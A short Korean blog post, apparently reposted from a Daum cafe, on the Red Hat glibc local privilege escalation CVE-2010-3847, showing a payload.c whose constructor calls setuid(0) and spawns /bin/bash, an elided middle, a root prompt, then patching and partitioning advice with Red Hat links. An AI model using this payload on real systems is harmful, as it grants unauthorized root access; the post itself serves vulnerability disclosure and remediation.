출처 : http://cafe.daum.net/redhat/D4GV/17
http://seclists.org/fulldisclosure/2010/Oct/257
CVE-2010-3847
>>>절차
$ cd /tmp
$ cat > payload.c
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
^D (ctrl +d)
..
..
중략....
..
..
# whoami
root
여기서 패스워드 변경
>>> 이에 대한 해결안 대략 2가지
1. 보통 두가지 해당 패키지를 YUM으로 업데이트 할것
2. sticky bit 가 있는 바이러리 디렉토리와 사용자가 쓸 수 있는 디렉토리를 파티션으로 분리할 것
>>> 주의사항
1. 이 패치를 위해서는 RHN을 사용할 수 있어야 합니다.
2.
>>> 관련 글
How can I apply security patches for a Red Hat Enterprise Linux system not connected on RHN or the internet?
https://access.redhat.com/kb/docs/DOC-17189
>>> On a Red Hat Enterprise Linux 5 machine, is it possible to limit yum so that it lists or installs only security updates?
https://access.redhat.com/kb/docs/DOC-10022
How do I know if a CVE name affects a Red Hat Enterprise Linux package?
https://access.redhat.com/kb/docs/DOC-11331
'oks 이야기' 카테고리의 다른 글
유투브 ISC2 채널 (0) | 2010.10.22 |
---|---|
정보보호 기술인력의 자격 기준(제44조 관련)<개정 2010.10. 1> (0) | 2010.10.21 |
최고의 슬라이딩 (0) | 2010.10.16 |
구글 웹 메일 서비스 및 도메인용 애플리케이션 (0) | 2010.10.06 |
금연시계 (손목 OR 탁상시계등) (0) | 2010.09.17 |